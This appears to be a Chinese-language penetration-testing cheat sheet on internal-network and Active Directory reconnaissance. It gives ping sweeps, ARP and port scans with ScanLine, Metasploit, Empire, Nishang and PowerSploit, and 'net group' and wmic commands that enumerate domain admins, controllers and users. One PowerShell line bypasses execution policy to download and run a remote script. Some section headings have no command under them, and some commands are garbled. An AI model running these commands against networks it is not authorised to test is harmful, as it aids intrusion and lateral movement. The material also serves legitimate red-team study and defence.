查询当前登录域及登录用户信息
判断主域
①:显示发生系统错误,说明存在域,但当前用户非域用户
②:正确回显DC的时间,说明当前用户为域用户
③:显示找不到域 WORKGROUP 的域控制器,说明当前环境为工作组,不存在域
利用ICMP协议探测内网
for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.1.%I | findstr "TTL=" |
ARP协议探测内网
1、arp-scan
arp-scan GitHub地址:https://github.com/royhills/arp-scan
arp.exe -t 192.168.0.1/24 |
Empire arp-scan模块
usemodule situational awareness/network/arpscan |
Nishang中的Invoke-ARPScan.ps1脚本
使用Nishang中的Invoke-ARPScan.psl脚本,可以将脚本上传到目标主机中运行,也可以直
接远程加载脚本、自定义掩码和扫描范围,命令如下
powershell.exe -exec bypass -Command "s (Import-Module C:\windows\temp\Invoke-ARPScan.ps1; Invoke-ARPScan -CIDR 192.168.1.0/20)">>C:\windows\temp\log.txt |
ScanLine
ScanLine是一款经典的端口扫描工具,可以在所有版本的Windows操作系统中使用,体积
小,仅使用单个文件,同时支持TCP/UDP端口扫描,命令如下
scan1ine -h -t 22,80-89,110,389,445,3389,1099,1433,2049,6379,7001,8080,1521, |
3306,3389,5432-u 53,161,137,139 -O c:\windows\temp1og.txt -p 192.168.1.1-254 /b |
s扫描器
S.exe TCP 192.168.1.1 192.168.1.254 445,3389,1433,7001,1099,8080,80,22,23,21, |
25,110,3306,5432,1521,6379,2049,111 256 /Banner /save |
MSF端口扫描
auxiliary/scanner/portscan/tcp模块
PowerSploit
powershell.exe -nop -exec bypass -c "IEX (New-object Net.Webclient).Downloadstring ('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/Invoke-Portscan.ps1');Invoke-Portscan -Hosts 192.168.1.0/24 -T 4 -ports '445,1433,8080,3389,80' -oA |
c:\windows\temp\res.txt" |
NiShang
Invoke-PortScan是Nishang的端口扫描模块,用于发现主机、解析主机名、扫描端口,是一
个很实用的模块。输入“Get-Help Invoke-PortScan-full”命令,即可查看帮助信息。
Invoke-.PortScan的参数介绍如下。
·StartAddress:扫描范围的开始地址。
·EndAddress:扫描范围的结束地址。
·ScanPort:进行端口扫描。
·Pot:指定扫描端口。默认扫描的端口有21、22、23、53、69、71、80、98、110、139、
111、389、443、445、1080、1433、2001、2049、3001、3128、5222、6667、6868、7777、
7878、8080、1521、3306、3389、5801、5900、5555、5901。
·TimeOut:设置超时时间
使用以下命令对本地局域网进行扫描,搜索存活主机并解析主机名
Invoke-PortScan -StartAddress 192.168.250.1 -EndAddress 192.168.250.255 -ResolveHost |
查询域
net view /domain
查询域内所有主机
查询域内所有用户组列表
注
- Domain Admins:域管理员。
- Domain Computers:域内机器。
- Domain Controllers:域控制器。
- Domain Guest:域访客,权限较低。
- Domain Users:域用户。
- Enterprise Admins:企业系统管理员用户。
在默认情况下,Domain Admins和Enterprise Admins对域内所有域控制器有完全控制权限。
查询所有域成员计算机列表
net group "domain computers" /domain |
获取域密码信息:执行如下命令,获取域密码策略、密码长度、错误锁定等信息
获取域信任信息
查看域控制器的机器名
查看当前时间
查看域控制器组
net group "Domain Controllers" /domain |
获取域内用户的详细信息
wmic useraccount get /all |
查看存在的用户
评论